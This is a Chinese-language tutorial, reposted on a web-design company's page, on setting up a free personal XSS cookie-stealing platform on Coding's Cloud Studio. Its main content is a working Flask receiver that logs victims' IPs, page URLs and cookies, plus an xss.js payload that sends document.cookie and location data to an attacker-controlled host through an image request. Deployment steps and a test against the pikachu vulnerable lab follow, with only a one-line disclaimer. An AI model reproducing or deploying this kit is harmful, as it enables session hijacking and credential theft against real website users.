這篇文章給大家介紹怎么零成本搭建個人專屬XSS平臺，內容非常詳細，感興趣的小伙伴們可以參考借鑒，希望對大家能有所幫助。

創新互聯建站主要從事網站建設、成都網站設計、網頁設計、企業做網站、公司建網站等業務。立足成都服務江南,十多年網站建設經驗,價格優惠、服務專業,歡迎來電咨詢建站服務:13518219792

0x00背景介紹

雖然現在網絡上有許多免費的XSS平臺，但使用體驗往往不是很好，經常在配置時需要等待很長的加載時間，其中的腳本也難以自行修改，同時也存在可能的后臺數據泄露等問題。本文意在通過其他技術途徑，搭建一個臨時的個人專用公網XSS平臺。

使用技術及組件：

Cloud Studio：Coding旗下的云端開發環境，支持動態頁面托管

python2.7/3.5+flask

js代碼參考BlueLotus_XSSReceiver平臺代碼，可自行擴展

0x01 代碼及原理

平臺使用了兩個代碼文件：

xss.js：xss利用腳本，可擴展

app.py：網站主體文件，具體原理非常簡單，將xss利用腳本掛載到網站根目錄下，使用時將如下poc嵌入到xss漏洞處進行使用。

  //如果太長也可以自行生成短鏈

網站訪問后會運行js腳本請求一張指定源的圖片，通過該源構造get請求到/rec目錄下，此目錄掛載的功能為處理參數并寫入到text.txt文件中，該文件即保存了我們最終所需要的cookie等數據。

app.py

# -*- coding: utf-8 -*-

from flask import Flask
from flask import render_template
from flask import request
import os
import datetime

APP_ROOT = os.path.dirname(os.path.abspath(__file__))   
TXT_PATH = os.path.join(APP_ROOT, 'templates') 
app = Flask(__name__)

@app.route('/')
def xss():
    return render_template('xss.js')
    
@app.route('/rec')
def rec():
    x=request.args
    ip=request.headers.getlist("X-Forwarded-For")[0]
    with open(os.path.join(TXT_PATH, 'text.txt'), 'a+') as f:
        f.write('--------------------------\n')
        print 'ok'
        f.write(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+'\n') 
        f.write('ip: '+ip+'\n')
        f.write('location: '+x['location']+'\n')
        f.write('toplocation: '+x['toplocation']+'\n')
        f.write('cookie: '+x['cookie']+'\n')
        f.write('opener: '+x['opener']+'\n')
            

    return 'ok'

if __name__ == '__main__':
    app.run(host='0.0.0.0')

xss.js

var website = "https://(個人域名)/rec";
(function() {
  (new Image()).src = website + '?location=' + escape((function() {
       try {
           return document.location.href
      } catch (e) {
           return ''
      }
  })()) + '&toplocation=' + escape((function() {
       try {
           return top.location.href
      } catch (e) {
           return ''
      }
  })()) + '&cookie=' + escape((function() {
       try {
           return document.cookie
      } catch (e) {
           return ''
      }
  })()) + '&opener=' + escape((function() {
       try {
           return (window.opener && window.opener.location.href) ? window.opener.location.href : ''
      } catch (e) {
           return ''
      }
  })());
})();

0x02 具體部署

訪問國內托管平臺Coding，注冊賬號并登錄，發布網站可能需要實名認證

點擊右側Cloud Studio進入工作空間

初始化

點擊新建工作空間，設置工作空間名稱XssPlatform，預置環境Ubuntu 18.04，代碼來源為空

點擊進入，選擇Python Demo

進入后會發現存在問題，沒事先記錄一下這條安裝執行命令，該命令具體含義為安裝程序所需相關python模塊并運行app.py

cat requirements.txt | xargs sudo pip install -i http://pypi.douban.com/simple --trusted-host pypi.douban.com && python app.py

關閉右下角框框，查看提示發現找不到pip命令，我們手動進行安裝

apt-get update #更新軟件源

apt-get upgrade #更新軟件

apt-get install python-pip #安裝python-pip組件

安裝成功后，重新執行我們記錄下來的命令運行程序

運行成功后按下ctrl+shift+p啟動命令面板，輸入preview，在命令列表中點擊Open Preview Tab，點擊選擇我的第一個python項目即可查看網頁預覽，記錄url以便后續使用

平臺配置

ctrl+c結束python進程，打開app.py，復制代碼文章給出的代碼；

將templates下的index.html重命名為xss.js，復制代碼，將個人域名處替換為記錄下的網頁url

在控制臺輸入python app.py運行網站，然后在瀏覽器中輸入域名訪問，顯示為js代碼內容即為配置成功

使用測試

使用pickachu開源漏洞靶場進行測試，進入反射型xss(post)，登入賬號，輸入利用poc，點擊提交

可以看到Cloud Studio中已經多出了一個文本文件text.txt，內容即為記錄的cookie等信息

0x03 注意事項

僅僅提供了一個簡單的平臺模型，更多的還是一種思路的拓展，請勿將其用于非法用途。

另外由于Cloud Studio的相關限制，平臺每天最多只能運行4個小時，關閉后就無法訪問

關于怎么零成本搭建個人專屬XSS平臺就分享到這里了，希望以上內容可以對大家有一定的幫助，可以學到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。

分享名稱：怎么零成本搭建個人專屬XSS平臺
網頁網址：http://www.yuzhuanjia.cn/article/giedep.html